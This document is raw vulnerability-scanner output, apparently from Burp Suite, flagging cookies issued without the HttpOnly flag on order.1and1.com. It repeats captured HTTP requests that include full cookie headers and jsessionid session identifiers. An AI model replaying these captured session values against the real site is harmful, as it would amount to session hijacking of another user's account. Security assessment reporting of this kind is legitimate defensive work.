GET /xml/order/FeatureMarketingCtrCitysearch;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=1bca04215a9d2000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureMarketingCtrGoogleAdWords HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureMarketingCtrGoogleAdWords;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureMarketingCtrSesub;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=1ae0db54ed0ae000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureMarketingCtrSesub HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureMarketingCtrStat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=471b83efa6aad000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureMarketingCtrStat HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=628afd437aeefc00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureParallelsPlesk HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=138db911f48c1c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureParallelsSB HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSecurityCertificate;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=4ca34797f0aac000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSecurityCertificate HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=159733db96707000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerDedOsLinux HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7f477cb0efbac400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerDedOsLinuxOpt HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=610a8252a61f9c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerDedOsWindows HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=87e626148423c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerDedOsWindowsOpt HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=2a662dae85f36400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerFirewall HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3615648872672000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerHarddrive HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=2f065831d35d1400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerMonitoring HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=4d33fa49f0c72000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerMonitoringCloud HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=52d42869220c5000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
